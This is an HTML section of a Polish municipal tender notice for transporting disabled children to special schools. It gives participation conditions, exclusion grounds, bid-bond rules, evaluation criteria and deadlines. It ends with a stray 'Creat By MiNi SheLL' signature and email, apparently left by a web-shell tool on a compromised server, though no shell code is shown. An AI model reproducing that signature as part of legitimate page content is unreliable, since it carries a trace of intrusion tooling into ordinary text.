                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający uzna warunek udziału za spełniony, jeżeli Wykonawca wykaże, że posiada aktualną licencję na krajowy transport drogowy osób, wymagany na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U z 2016 r. poz.1907 z późn. zm.)<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                 Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, iż   
posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na minimum 100.000,00 zł.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1) W zakresie zdolności technicznej lub zawodowej w zakresie doświadczenia Wykonawcy:Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, dwie usługi, które odpowiadają swoim rodzajem przedmiotowi zamówienia (tj. usługa dowozu dzieci i młodzieży niepełnosprawnej do specjalnych przedszkoli, szkół i ośrodków szkolno-wychowawczych), o wartości brutto minimum 300.000,00 zł każda.
2)W zakresie zdolności technicznej lub zawodowej w zakresie w zakresie dysponowania narzędziami do realizacji zamówienia: Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje minimum 3 pojazdami przystosowanymi do przewozu niepełnosprawnych osób na wózku inwalidzkim, wyprodukowanymi nie wcześniej niż w 2004 roku, sprawnymi, o następujących właściwościach, tj.:
a) posiadające specjalistyczne podesty dla wózków inwalidzkich lub specjalistyczne urządzenia do przemieszczania osób niepełnosprawnych (windy)z tym, że specjalistyczne urządzenia do przemieszczania osób  niepełnosprawnych (windy) muszą posiadać ważną decyzję UDT o dopuszczeniu do eksploatacji,
b) posiadające specjalistyczne pasy do mocowania wózków,
     c) posiadające oznakowanie zgodne z obowiązującym prawem  RP. 
3)W zakresie potencjału osób skierowanych przez Wykonawcę do realizacji zamówienia Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi odpowiednie kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonywania zamówienia, w tym:  minimum trzema osobami z uprawnieniami do kierowania pojazdami kat. B, oraz minimum trzema osobami, które zapewnią opiekę nad dziećmi w czasie dowozu, posiadającymi odbyte szkolenie z zakresu pierwszej pomocy, posiadające co najmniej roczne doświadczenie w opiece nad osobami niepełnosprawnymi.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy Pzp;
2)	oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej Wykonawca może  złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. 

UWAGA: Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy Pzp Wykonawca, zgodnie z przepisem art. 24 ust. 11 ustawy Pzp, przekazuje Zamawiającemu w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca powinien przestawić, pod rygorem wykluczenia z postępowania o udzielenie zamówienia, dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia - załącznik nr 7 do SIWZ.


</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	W celu potwierdzenia spełniania warunku, o którym mowa w Rozdz. X pkt 2 lit a) SIWZ  złoży licencję potwierdzającą, że wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
2)	W celu potwierdzenia spełniania warunku, o którym mowa w rozdz. X ust. 3  pkt. 2) lit. b) SIWZ  złoży wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (załącznik nr 4 do SIWZ); 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1)	W celu potwierdzenia spełniania warunku, o którym mowa w rozdz. X ust. 3  pkt. 2) lit. c)  SIWZ  złoży wykaz narzędzi dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (załącznik nr 5 do SIWZ);
2)	W celu potwierdzenia spełniania warunku, o którym mowa w rozdz. X ust. 3 pkt 2 lit. d) złoży wykaz osób kierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 6 do SIWZ); 
3)	 W celu potwierdzenia spełniania warunku, o którym mowa w rozdz. X ust. 3  pkt. 2) lit. e) SIWZ złoży  informację, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego. 
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Przystępując do przetargu, Wykonawca jest obowiązany wnieść wadium w wysokości                10.000,00 zł.
1.	Wadium może być wnoszone w:
1)	pieniądzu,
2)	poręczeniu bankowym lub poręczeniu spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240).
2.	Wadium należy wnieść  przed upływem terminu składania ofert.
3.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia dokument potwierdzający wniesienie wadium w jednej z form wymienionych w rozdziale XIV ust. 1 pkt 2-5 SIWZ może zostać wystawiony na jednego z Wykonawców. 
4.	Wadium wniesione w pieniądzu należy wpłacić na konto 15 8002 0004 0200 1111 2002 0067 (liczy się data wpływu na podane konto).
5.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6.	Jeżeli wadium zostanie wniesione w pieniądzu przelewem, na poleceniu (w tytule) przelewu należy wpisać Wadium  postępowanie o udzielenie zamówienia publicznego nr ZP.271.56.2016.
Zamawiający wymaga załączenia do oferty potwierdzenia dokonania wpłaty wadium.
7.	W przypadku wnoszenia wadium w innej formie niż pieniądze oryginał należy złożyć w Wydziale Finansowym Urzędu Miasta i Gminy Konstancin-Jeziorna, ul. Warszawska 31, 05-520 Konstancin-Jeziorna, I piętro, pok. nr 6 - przed upływem terminu składania ofert, natomiast kopię należy zamieścić w ofercie.
8.	W przypadku składania  przez Wykonawcę wadium w formie gwarancji, o której mowa w ust. 1 pkt 3  4 powyżej, zaleca się aby dokument gwarancji zawierał między innymi następujące elementy:
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego) gwaranta (banku lub instytucji, ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib i adresu,
2)	przytoczenie nazwy i przedmiotu niniejszego postępowania, znak postępowania nadanego przez Zamawiającego,
3)	 kwotę gwarancji,
4)	okres na jaki gwarancja została wystawiona (odpowiadający co najmniej terminowi związania ofertą),
5)	zobowiązanie gwaranta do nieodwołalnego i bezwarunkowego zapłacenia kwoty gwarancji, na pierwsze pisemne żądanie Zamawiającego, w przypadkach określonych w art. 46 ust. 4a i 5 ustawy Pzp.
9.	Dokumenty muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą. Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp.



Zwrot wadium
1.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 7.
2.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
3.	Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zawrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
5.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
6.	Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku gdy:
1)	odmówi podpisania umowy na warunkach określonych w ofercie,
2)	nie wniósł zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7.	Na mocy art. 46 ust. 4a ustawy Pzp zostanie zatrzymane wadium Wykonawcy,  jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 25 a ust. 1 ustawy Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
8.	W ofercie należy podać numer konta (w przypadku wadium wniesionego w pieniądzu) lub adres (w pozostałych przypadkach), na jakie Zamawiający dokona zwrotu wadium.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Parametry techniczne (rok produkcji samochodów)</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający pozostając w zgodzie z art. 144 ustawy Pzp przewiduje zmianę postanowień zawartej umowy w stosunku do treści oferty w następującym zakresie:
1) w zakresie zmiany podwykonawców na wniosek Wykonawcy;
2)	w zakresie zmiany miejsca zamieszkania ucznia na terenie gminy Konstancin Jeziorna lub placówki do której jest wożony, zmiany ilości przewożonych dzieci, bez konieczności zmieniania wynagrodzenia ryczałtowego;
3)	w zakresie zmiany terminu realizacji umowy, w tym rozpoczęcia świadczenia usługi - wynikający z okoliczności, których nie dało się przewidzieć w chwili zawierania umowy lub zmiana jest uzasadniona potrzebami Zamawiającego;
4) w zakresie zmiany wartości brutto netto umowy, jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki VAT w następstwie zmian przepisów podatkowych. Kwota brutto pozostaje bez zmian;
5) w zakresie zmiany sposobu realizacji przedmiotu umowy, uzasadnionej potrzebami osób, na rzecz których jest wykonywana lub uzasadniona potrzebami Zamawiającego. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 16/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com